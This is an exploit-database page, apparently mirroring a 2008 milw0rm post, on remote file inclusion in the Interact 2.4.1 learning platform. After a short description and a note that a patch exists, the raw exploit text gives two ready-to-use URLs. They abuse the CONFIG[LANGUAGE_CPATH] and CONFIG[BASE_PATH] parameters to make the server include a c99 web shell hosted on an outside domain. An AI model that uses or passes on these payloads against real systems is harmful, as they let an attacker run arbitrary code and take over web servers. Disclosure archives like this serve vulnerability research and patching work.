header-logo
Suggest Exploit
vendor:
Interact
by:
RoMaNcYxHaCkEr
7.5
CVSS
HIGH
Remote File Inclusion (RFI)
94
CWE
Product Name: Interact
Affected Version From: 2.4.2001
Affected Version To: 2.4.2001
Patch Exists: Yes
Related CWE: N/A
CPE: a:interact:interact:2.4.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

interact 2.4.1 Multiple Remote RFI Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'CONFIG[LANGUAGE_CPATH]' and 'CONFIG[BASE_PATH]' parameters to the 'embedforum.php' and 'lib.inc.php' scripts respectively. This can be exploited to execute arbitrary PHP code by including a remote file via a URL in these parameters.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to apply the patch as soon as possible.
Source

Exploit-DB raw data:

-==========================================[ ViVa Islam + YeMeN ]====================================-

# Name : interact 2.4.1 Multiple Remote RFI Vulnerabiliy

# Download From : http://puzzle.dl.sourceforge.net/sourceforge/cce-interact/interact-2-4-1.tar.gz

# Found By : RoMaNcYxHaCkEr     [RoMaNTiC-TeaM]  ( BlackxHat , BlackBox , aLwHEeD )        

# Home Page :  WwW.4RxH.CoM            

+======================================================================================================================+

# Exploits :

* Must Be Register_Globals Is On

http://WwW.4RxH.CoM/interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=http://rxh.freehostia.com/shells/c99in.txt?

http://WwW.4RxH.CoM/interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=http://rxh.freehostia.com/shells/c99in.txt?

That,s It,s

Good Luck Everybody

+=======================================================================================================================+

# Greet To :

Tryag TeaM & All Members Of My Forum & Anyone Hate Me  :) 

# For Contact : Nothing>> That,s Damage And Flooded Ha Ha  ;) 

# bEST wISHES

-==========================================[ ViVa Islam + YeMeN ]====================================-

# milw0rm.com [2008-04-30]

Navigation

Suggest Exploit

Services By CQR